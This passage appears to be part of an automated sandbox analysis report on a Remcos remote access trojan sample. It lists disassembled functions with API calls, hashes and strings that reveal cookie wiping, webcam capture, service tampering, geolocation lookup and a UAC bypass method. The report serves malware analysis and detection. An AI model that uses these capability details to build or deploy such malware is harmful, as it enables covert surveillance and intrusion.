                                                          • Instruction ID: 92049c6ae7fba3f13a57cd60a3827c89810429dfa6cf24b756c0ab1f01d338b1
                                                          • Opcode Fuzzy Hash: bf697a078cb867d97e45357ac50b9e71af34c85f47cf55f872e92a0cd902ea26
                                                          • Instruction Fuzzy Hash: 0141A2316042009BC224F635D9A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
                                                          Function 00437A80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _ValidateLocalCookies.LIBCMT ref: 00437AAB
                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AB3
                                                          • _ValidateLocalCookies.LIBCMT ref: 00437B41
                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B6C
                                                          • _ValidateLocalCookies.LIBCMT ref: 00437BC1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                          • String ID: csm
                                                          • API String ID: 1170836740-1018135373
                                                          • Opcode ID: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
                                                          • Instruction ID: 9404c61c081bc4e6da2099be8a52027e1297fde76841380def533d3eaa533744
                                                          • Opcode Fuzzy Hash: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
                                                          • Instruction Fuzzy Hash: CD410970A04209DBCF20EF19C844A9FBBB5AF0932CF14915BE8556B392D739EE05CB95
                                                          Function 0040B6EA Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00412513: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                            • Part of subcall function 00412513: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                            • Part of subcall function 00412513: RegCloseKey.ADVAPI32(?), ref: 0041255F
                                                          • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                                                          • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                          • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                          • API String ID: 1133728706-4073444585
                                                          • Opcode ID: b2ac8dee5e5069ae19a2430ed362db1d01aada1bcbcc6095e396115e7a02ca7f
                                                          • Instruction ID: d844a8c095f6bc09782a4352348c5dfd082864f820bca84d12e352ec49be167e
                                                          • Opcode Fuzzy Hash: b2ac8dee5e5069ae19a2430ed362db1d01aada1bcbcc6095e396115e7a02ca7f
                                                          • Instruction Fuzzy Hash: 5F216D71A00109A6CB04F7B2DCA69EE7764AE95318F40013FE902771D2EB7C9A49C6DE
                                                          Function 00455903 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a689da314200d05c27aed096e5791327431372d8d81dee2cdc260883e4ab0459
                                                          • Instruction ID: 969edc756a0dffe936139f0dc9bce31aed38431af2e56c5058bd22e5c2f4fad6
                                                          • Opcode Fuzzy Hash: a689da314200d05c27aed096e5791327431372d8d81dee2cdc260883e4ab0459
                                                          • Instruction Fuzzy Hash: 991124B1508654FBDB202F769C4493B3B6CEF82376B10016FFC15D7242DA7C8805C2AA
                                                          Function 0040FBEF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                                                          • int.LIBCPMT ref: 0040FC0F
                                                            • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                            • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                          • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                          • String ID: P[G
                                                          • API String ID: 2536120697-571123470
                                                          • Opcode ID: 31ce6fe8dfd7390de1d64992225249e105d572f1378bab70f4a441faf385e78a
                                                          • Instruction ID: a46b155a0a589d4ea75c4983af6a631921b9d9812a15003568faaf62f6f01cf1
                                                          • Opcode Fuzzy Hash: 31ce6fe8dfd7390de1d64992225249e105d572f1378bab70f4a441faf385e78a
                                                          • Instruction Fuzzy Hash: 7611F331904518A7CB14FBA5D8469DEB7689E44358B20007BF905B72C1EB7CAE45C79D
                                                          Function 0041A51B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68networkfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A53E
                                                          • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A554
                                                          • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A56D
                                                          • InternetCloseHandle.WININET(00000000), ref: 0041A5B3
                                                          • InternetCloseHandle.WININET(00000000), ref: 0041A5B6
                                                          Strings
                                                          • http://geoplugin.net/json.gp, xrefs: 0041A54E
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Internet$CloseHandleOpen$FileRead
                                                          • String ID: http://geoplugin.net/json.gp
                                                          • API String ID: 3121278467-91888290
                                                          • Opcode ID: 8d796e82819d20c7747317835cdf85fb334a8da14db2c504802a4fd71c56bfc3
                                                          • Instruction ID: 402fbdb1aff19a1981f8347c65821a4f206ec005c70a85ea4635686413b1fe25
                                                          • Opcode Fuzzy Hash: 8d796e82819d20c7747317835cdf85fb334a8da14db2c504802a4fd71c56bfc3
                                                          • Instruction Fuzzy Hash: 2711C87110A3126BD214AA169C45DBF7FDCEF46365F00053EF905D2191DB689C48C6B6
                                                          Function 0044FCDB Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0044FA22: _free.LIBCMT ref: 0044FA4B
                                                          • _free.LIBCMT ref: 0044FD29
                                                            • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                            • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                          • _free.LIBCMT ref: 0044FD34
                                                          • _free.LIBCMT ref: 0044FD3F
                                                          • _free.LIBCMT ref: 0044FD93
                                                          • _free.LIBCMT ref: 0044FD9E
                                                          • _free.LIBCMT ref: 0044FDA9
                                                          • _free.LIBCMT ref: 0044FDB4
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                          • Instruction ID: b6f47af98b99390d2ca34363280ce03bc5e4d1be0f6c4f29549f69d6ae0d3a9a
                                                          • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                          • Instruction Fuzzy Hash: 5F119031711B04B6F520FBB2CC07FCBB7DC9F42308F814C2EB29E76152E628A9184645
                                                          Function 0041A463 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 59COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                            • Part of subcall function 00412513: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                            • Part of subcall function 00412513: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                            • Part of subcall function 00412513: RegCloseKey.ADVAPI32(?), ref: 0041255F
                                                          • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4D9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCurrentOpenProcessQueryValue
                                                          • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                          • API String ID: 1866151309-2070987746
                                                          • Opcode ID: 55ad628b9ffecf6fc05846b0b449cc9ef91119f19e10ab231a0cee3385cadad7
                                                          • Instruction ID: 19977b185b3bcff34fa520d2ecc4782d624f476aadfe6515b429a208ce335d2f
                                                          • Opcode Fuzzy Hash: 55ad628b9ffecf6fc05846b0b449cc9ef91119f19e10ab231a0cee3385cadad7
                                                          • Instruction Fuzzy Hash: EF11E9A060020166C704B365DCABDBF765ADB90304F50443FB906E31D2EB6C9E9683EE
                                                          Function 00406815 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe), ref: 00406835
                                                            • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                                            • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                          • CoUninitialize.OLE32 ref: 0040688E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InitializeObjectUninitialize_wcslen
                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                          • API String ID: 3851391207-1062857032
                                                          • Opcode ID: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                          • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                                                          • Opcode Fuzzy Hash: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                          • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                                                          Function 0040FED2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                                                          • int.LIBCPMT ref: 0040FEF2
                                                            • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                            • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                          • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                          • String ID: H]G
                                                          • API String ID: 2536120697-1717957184
                                                          • Opcode ID: 3e4a8574ab9db7722bfa12a95caa071d2d4e3d0815d43ad0032f2c9a3dec5087
                                                          • Instruction ID: c39742161ac3258eace465d30f2780732a1ff9819e97f4bd037edafe9ec39b9f
                                                          • Opcode Fuzzy Hash: 3e4a8574ab9db7722bfa12a95caa071d2d4e3d0815d43ad0032f2c9a3dec5087
                                                          • Instruction Fuzzy Hash: 9011BF31900419ABCB24FBA5C8468DDB7799F95318B20007FF505B72C1EB78AF09C799
                                                          Function 0040B2A8 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                                                          • GetLastError.KERNEL32 ref: 0040B2EE
                                                          Strings
                                                          • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                                                          • [Chrome Cookies not found], xrefs: 0040B308
                                                          • UserProfile, xrefs: 0040B2B4
                                                          • [Chrome Cookies found, cleared!], xrefs: 0040B314
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DeleteErrorFileLast
                                                          • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                          • API String ID: 2018770650-304995407
                                                          • Opcode ID: 89984b89c506dd7c72a5c030867ac5c43e97c4af1a23029286eaf0e318e25243
                                                          • Instruction ID: 647c9f6895dd19beb09db90be4e639f81332b1b521455d1adc7a9c6a9ee315b4
                                                          • Opcode Fuzzy Hash: 89984b89c506dd7c72a5c030867ac5c43e97c4af1a23029286eaf0e318e25243
                                                          • Instruction Fuzzy Hash: 3301A23164410557CB047BB5DD6B8AF3624ED50708F60013FF802B32E2FE3A9A0586CE
                                                          Function 0041BEB0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 47memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • AllocConsole.KERNEL32(00474358), ref: 0041BEB9
                                                          • ShowWindow.USER32(00000000,00000000), ref: 0041BED2
                                                          • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BEF7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Console$AllocOutputShowWindow
                                                          • String ID: Remcos v$5.3.0 Pro$CONOUT$
                                                          • API String ID: 2425139147-2527699604
                                                          • Opcode ID: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                          • Instruction ID: 482f1cdaf256b8236abc94a0b12de3dc55517b66349f776fa4240982defd8f75
                                                          • Opcode Fuzzy Hash: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                          • Instruction Fuzzy Hash: 180171B19803047BD600FBF29D4BFDD37AC9B14705F5004277644E7093EABCA554866D
                                                          Function 004064D0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • BG, xrefs: 00406909
                                                          • (CG, xrefs: 0040693F
                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, xrefs: 00406927
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (CG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe$BG
                                                          • API String ID: 0-4127071392
                                                          • Opcode ID: d1be4aec57154437973d558091bbe471e33116169eb7d1567a4c56866b781843
                                                          • Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
                                                          • Opcode Fuzzy Hash: d1be4aec57154437973d558091bbe471e33116169eb7d1567a4c56866b781843
                                                          • Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
                                                          Function 00419F32 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                          • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F64
                                                          • PlaySoundW.WINMM(00000000,00000000), ref: 00419F72
                                                          • Sleep.KERNEL32(00002710), ref: 00419F79
                                                          • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F82
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: PlaySound$HandleLocalModuleSleepTime
                                                          • String ID: Alarm triggered$`#v
                                                          • API String ID: 614609389-3049340936
                                                          • Opcode ID: 141847ae0a337ee7d375b115724b17f178aaf380715d2b927a7afb315ef2a384
                                                          • Instruction ID: 0fe531f7edf44dbbc4d7c544cb5d4c76277d8d7fe89cd9bd4aa838a143c441bc
                                                          • Opcode Fuzzy Hash: 141847ae0a337ee7d375b115724b17f178aaf380715d2b927a7afb315ef2a384
                                                          • Instruction Fuzzy Hash: 50E09A22A0422033862033BA7C0FC6F3E28DAC6B75B4100BFF905A21A2AE54081086FB
                                                          Function 004395FC Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __allrem.LIBCMT ref: 00439789
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397A5
                                                          • __allrem.LIBCMT ref: 004397BC
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397DA
                                                          • __allrem.LIBCMT ref: 004397F1
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043980F
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                          • String ID:
                                                          • API String ID: 1992179935-0
                                                          • Opcode ID: f1fde5a02fd595428c5ea82786117b3ca59670a7c5a9c6947d2ee4ceb3542413
                                                          • Instruction ID: 29148231e9435c1f59b8c02308e8e4f0c882d016d38a0f6ab7871d26eba04b65
                                                          • Opcode Fuzzy Hash: f1fde5a02fd595428c5ea82786117b3ca59670a7c5a9c6947d2ee4ceb3542413
                                                          • Instruction Fuzzy Hash: 7A811B726017069BE724AE79CC82B6F73A8AF49328F24512FF511D66C1E7B8DD018B58
                                                          Function 00444B3D Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __cftoe
                                                          • String ID:
                                                          • API String ID: 4189289331-0
                                                          • Opcode ID: 6857f65105857f94604de097a755c155121e7cc81d429690707872ca309dbf5f
                                                          • Instruction ID: 646e0444ce84107b4b6d0ff1d92098e8eb0dfa86acef9ec08128487301265115
                                                          • Opcode Fuzzy Hash: 6857f65105857f94604de097a755c155121e7cc81d429690707872ca309dbf5f
                                                          • Instruction Fuzzy Hash: A851FC72900105ABFB249F598C81F6F77A9EFC9324F15421FF815A6281DB3DDD01866D
                                                          Function 00446159 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __freea$__alloca_probe_16
                                                          • String ID: a/p$am/pm
                                                          • API String ID: 3509577899-3206640213
                                                          • Opcode ID: ef0e82919ac3b8602debd5a299a6af15dd8aa9f36d72cee99fb0876ec95c8b0f
                                                          • Instruction ID: cf09b504ad0dd49156c227457699755419044adef71e8be36bbdd309731302d4
                                                          • Opcode Fuzzy Hash: ef0e82919ac3b8602debd5a299a6af15dd8aa9f36d72cee99fb0876ec95c8b0f
                                                          • Instruction Fuzzy Hash: 5FD1F271A00206EAFB249F68D945ABBB7B0FF06300F26415BE905AB749D37D8D41CB5B
                                                          Function 00403DE7 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 135sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Sleep.KERNEL32(00000000), ref: 00403E8A
                                                            • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: H_prologSleep
                                                          • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
                                                          • API String ID: 3469354165-462540288
                                                          • Opcode ID: fd84d583727d63a22948aa60d8945a9d52214e7481cacf893f5ebe8d1c8ecc38
                                                          • Instruction ID: 0dce3c58988623f436d5c5d916b021fc345e3c2d86dff9f08dc17926b78fee06
                                                          • Opcode Fuzzy Hash: fd84d583727d63a22948aa60d8945a9d52214e7481cacf893f5ebe8d1c8ecc38
                                                          • Instruction Fuzzy Hash: A441A330A0420197CA14FB79C816AAD3A655B45704F00453FF809A73E2EF7C9A45C7CF
                                                          Function 00419DEC Relevance: 9.1, APIs: 6, Instructions: 66serviceCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419DFC
                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E10
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E1D
                                                          • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419507), ref: 00419E52
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E64
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E67
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                          • String ID:
                                                          • API String ID: 493672254-0
                                                          • Opcode ID: 02b88ba3e7911ce8c5ead6755d78df319317ed7b9ebc03ba342fc4c032229c57
                                                          • Instruction ID: c28812c6d5a3476d8c1fe7dae916194da5da8b168be8dbaba893861dad7fc5da
                                                          • Opcode Fuzzy Hash: 02b88ba3e7911ce8c5ead6755d78df319317ed7b9ebc03ba342fc4c032229c57
                                                          • Instruction Fuzzy Hash: 3301F5311483147AD7119B39EC5EEBF3AACDB42B71F10022BF526D62D1DA68DE8181A9
                                                          Function 00437E06 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,00437DFD,004377B1), ref: 00437E14
                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E22
                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E3B
                                                          • SetLastError.KERNEL32(00000000,?,00437DFD,004377B1), ref: 00437E8D
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLastValue___vcrt_
                                                          • String ID:
                                                          • API String ID: 3852720340-0
                                                          • Opcode ID: 8677577c8e37d81537f7299acd8b5f5a9cc683e2404a7ed47504fd76d00458cf
                                                          • Instruction ID: be779a20f6972cc68ff7cd304671387be2c97454b743a33de387a584dbd8fa65
                                                          • Opcode Fuzzy Hash: 8677577c8e37d81537f7299acd8b5f5a9cc683e2404a7ed47504fd76d00458cf
                                                          • Instruction Fuzzy Hash: 2A01D8B222D315ADEB3427757C87A172699EB09779F2013BFF228851E1EF294C41914C
                                                          Function 00446EBF Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                          • _free.LIBCMT ref: 00446EF6
                                                          • _free.LIBCMT ref: 00446F1E
                                                          • SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                          • SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                          • _abort.LIBCMT ref: 00446F3D
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$_free$_abort
                                                          • String ID:
                                                          • API String ID: 3160817290-0
                                                          • Opcode ID: ee081b98001fac20135d606adf3ebd9ed25e83f06873042332f69cc5cc1fb8f1
                                                          • Instruction ID: 3d2b287d931d31d162837175e2379b90ae0e47a7897f975c134f35b9cb22fcab
                                                          • Opcode Fuzzy Hash: ee081b98001fac20135d606adf3ebd9ed25e83f06873042332f69cc5cc1fb8f1
